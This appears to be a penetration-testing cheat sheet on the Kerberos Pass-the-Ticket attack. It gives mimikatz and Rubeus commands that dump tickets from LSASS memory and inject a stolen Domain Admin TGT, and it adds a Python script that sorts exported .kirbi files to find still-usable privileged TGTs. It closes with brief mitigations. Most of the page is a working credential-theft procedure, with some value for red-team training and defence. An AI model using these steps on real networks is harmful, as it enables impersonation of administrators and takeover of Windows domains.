Pass the Ticket
Overview
Use mimikatz to dump Kerberos tickets (TGTs and service tickets) from LSASS memory; this needs local admin or SYSTEM on the host
This yields .kirbi ticket files; a TGT taken from a Domain Admin session can be injected to act as Domain Admin anywhere in the domain until the ticket expires (default lifetime 10 hours, renewable for up to 7 days)
Inject (pass) a stolen ticket into your own logon session to impersonate its owner; the ticket is used as-is, no password or hash needed
Can also use base64-encoded tickets gathered with Rubeus (Rubeus.exe dump) and inject them with Rubeus.exe ptt /ticket:<base64>
Look for Administrator (or other privileged account) TGTs: the export file name shows the user and the service, and a TGT has krbtgt as the service
Exploitation
# Start mimikatz, enable debug privilege and impersonate SYSTEM (needs local admin)
mimikatz.exe
privilege::debug
token::elevate
# Export every cached ticket from LSASS as a .kirbi file in the current directory
# (file names include user and service; TGTs show krbtgt, e.g. Administrator@krbtgt-DOMAIN)
sekurlsa::tickets /export
# Optionally clear the current session's tickets first so an existing ticket for the
# same service does not take precedence over the injected one
klist purge
# Inject the chosen ticket into the current logon session
kerberos::ptt <ticket>.kirbi
# Verify the injected ticket is now in the session cache (mimikatz equivalent: kerberos::list)
klist
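After the export you usually have dozens of .kirbi files and need to know which one is a still-valid TGT for a privileged account. The following is an added example written for this page (not mimikatz or Rubeus code): a dependency-free parser for the KRB-CRED structure that .kirbi files contain (RFC 4120 ASN.1, DER encoded, with the enc-part left unencrypted as etype 0, which is how mimikatz and Rubeus export tickets) plus a triage step that keeps only TGTs for the named accounts that are valid, or expired but renewable. The account names, realm LAB.LOCAL, service names, times and the sample tickets are constructed for the demo; a small DER writer is included only to build those samples in place of real exports.

```python
"""Triage exported .kirbi (KRB-CRED) files: which account, which service, still usable?
Added example, not mimikatz/Rubeus code. Sample tickets below are constructed."""
import datetime as dt

UTC = dt.timezone.utc
TICKET_FLAGS = {0x40000000: "forwardable", 0x00800000: "renewable",
                0x00400000: "initial", 0x00200000: "pre-authent"}

# ---- minimal DER reader (every Kerberos tag used here fits in one byte) ----
def der_decode(buf):
    """Return a list of (tag, payload): child list for constructed nodes, raw bytes otherwise."""
    nodes, i = [], 0
    while i < len(buf):
        tag, first = buf[i], buf[i + 1]
        i += 2
        if first < 0x80:
            length = first
        else:                                   # long-form length
            length = int.from_bytes(buf[i:i + (first & 0x7F)], "big")
            i += first & 0x7F
        body = buf[i:i + length]
        i += length
        nodes.append((tag, der_decode(body) if tag & 0x20 else body))
    return nodes

def _ctx(children, n):
    """Element wrapped in context tag [n], or None when that optional field is absent."""
    for tag, payload in children:
        if tag == 0xA0 | n:
            return payload[0]
    return None

def _principal(node):                           # PrincipalName -> "part1/part2"
    return "/".join(s.decode() for _, s in _ctx(node[1], 1)[1])

def _ktime(node):                               # KerberosTime (GeneralizedTime, UTC)
    return dt.datetime.strptime(node[1].decode(), "%Y%m%d%H%M%SZ").replace(tzinfo=UTC)

def parse_kirbi(data):
    """Parse a KRB-CRED blob as written by sekurlsa::tickets /export (enc-part etype 0)."""
    (tag, body), = der_decode(data)
    if tag != 0x76:                             # [APPLICATION 22] KRB-CRED
        raise ValueError("not a KRB-CRED structure")
    enc_part = _ctx(body[0][1], 3)
    etype = int.from_bytes(_ctx(enc_part[1], 0)[1], "big")
    if etype != 0:
        raise ValueError("enc-part is encrypted (etype %d); expected a plaintext export" % etype)
    (_, cred), = der_decode(_ctx(enc_part[1], 2)[1])     # [APPLICATION 29] EncKrbCredPart
    out = []
    for _, ch in _ctx(cred[0][1], 0)[1]:                   # ticket-info: SEQUENCE OF KrbCredInfo
        flags = int.from_bytes(_ctx(ch, 3)[1][1:], "big")  # BIT STRING: skip unused-bits byte
        renew = _ctx(ch, 7)                                # renew-till is optional
        out.append({"client": _principal(_ctx(ch, 2)), "realm": _ctx(ch, 1)[1].decode(),
                    "service": _principal(_ctx(ch, 9)),
                    "flags": [name for bit, name in TICKET_FLAGS.items() if flags & bit],
                    "endtime": _ktime(_ctx(ch, 6)),
                    "renew_till": _ktime(renew) if renew else None})
    return out

def select_usable_tgts(tickets, now, accounts=("Administrator",)):
    """TGTs (service krbtgt/REALM) for the target accounts: valid, or expired but renewable."""
    hits = []
    for t in tickets:
        if not t["service"].startswith("krbtgt/") or t["client"] not in accounts:
            continue
        if now < t["endtime"]:
            hits.append((t, "valid"))
        elif "renewable" in t["flags"] and t["renew_till"] and now < t["renew_till"]:
            hits.append((t, "expired, renewable"))
    return hits

def triage(blobs, now=None):
    now = now or dt.datetime.now(UTC)
    return [(t["client"] + "@" + t["realm"], t["service"], status)
            for blob in blobs for t, status in select_usable_tgts(parse_kirbi(blob), now)]

# ---- minimal DER writer, used only to construct the sample tickets ----
def _tlv(tag, body):
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    nb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(nb)]) + nb + body

def _c(n, body): return _tlv(0xA0 | n, body)                       # context [n]
def _int(v): return _tlv(0x02, bytes([v]))                         # small non-negative INTEGER
def _str(s): return _tlv(0x1B, s.encode())                         # GeneralString
def _time(d): return _tlv(0x18, d.strftime("%Y%m%d%H%M%SZ").encode())
def _princ(*parts):
    return _tlv(0x30, _c(0, _int(1)) + _c(1, _tlv(0x30, b"".join(_str(p) for p in parts))))

def build_sample_kirbi(client, realm, service, start, end, renew_till, flags=0x40E10000):
    """Constructed KRB-CRED with one ticket; the Ticket's own enc-part is an opaque dummy blob."""
    enc_data = _tlv(0x30, _c(0, _int(18)) + _c(2, _tlv(0x04, b"\x00" * 16)))
    ticket = _tlv(0x61, _tlv(0x30, _c(0, _int(5)) + _c(1, _str(realm))
                                 + _c(2, _princ(*service)) + _c(3, enc_data)))
    info = _tlv(0x30, _c(0, _tlv(0x30, _c(0, _int(18)) + _c(1, _tlv(0x04, b"\x11" * 32))))
                + _c(1, _str(realm)) + _c(2, _princ(client))
                + _c(3, _tlv(0x03, b"\x00" + flags.to_bytes(4, "big")))
                + _c(4, _time(start)) + _c(5, _time(start)) + _c(6, _time(end))
                + _c(7, _time(renew_till)) + _c(8, _str(realm)) + _c(9, _princ(*service)))
    cred_part = _tlv(0x7D, _tlv(0x30, _c(0, _tlv(0x30, info))))
    enc_part = _tlv(0x30, _c(0, _int(0)) + _c(2, _tlv(0x04, cred_part)))
    return _tlv(0x76, _tlv(0x30, _c(0, _int(5)) + _c(1, _int(22))
                               + _c(2, _tlv(0x30, ticket)) + _c(3, enc_part)))

NOW = dt.datetime(2024, 6, 1, 12, 0, tzinfo=UTC)                  # constructed "current time"
SAMPLES = [  # constructed: a live DA TGT, an expired-but-renewable DA TGT, a user's CIFS ticket
    build_sample_kirbi("Administrator", "LAB.LOCAL", ("krbtgt", "LAB.LOCAL"),
                       dt.datetime(2024, 6, 1, 8, 0, tzinfo=UTC), dt.datetime(2024, 6, 1, 18, 0, tzinfo=UTC),
                       dt.datetime(2024, 6, 8, 8, 0, tzinfo=UTC)),
    build_sample_kirbi("Administrator", "LAB.LOCAL", ("krbtgt", "LAB.LOCAL"),
                       dt.datetime(2024, 5, 31, 0, 0, tzinfo=UTC), dt.datetime(2024, 5, 31, 10, 0, tzinfo=UTC),
                       dt.datetime(2024, 6, 7, 0, 0, tzinfo=UTC)),
    build_sample_kirbi("jdoe", "LAB.LOCAL", ("cifs", "FS01.LAB.LOCAL"),
                       dt.datetime(2024, 6, 1, 9, 0, tzinfo=UTC), dt.datetime(2024, 6, 1, 19, 0, tzinfo=UTC),
                       dt.datetime(2024, 6, 8, 9, 0, tzinfo=UTC)),
]

if __name__ == "__main__":
    for line in triage(SAMPLES, NOW):
        print(*line)
```

In practice you feed `triage` the bytes of each exported file (`open(path, "rb").read()`); an "expired, renewable" hit can still be renewed with Rubeus renew before it is passed, while a ticket past renew-till is dead and a new one must be stolen.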
Mitigation:
Don't let domain admins log onto anything except domain controllers (tiered admin model; deny DA logon to workstations and member servers with GPO user-rights assignments), because a stolen TGT is only as valuable as the account that left it in LSASS
Put privileged accounts in the Protected Users group (shorter TGT lifetime, no delegation) and enable Credential Guard so ticket material in LSASS is isolated from user-mode dumping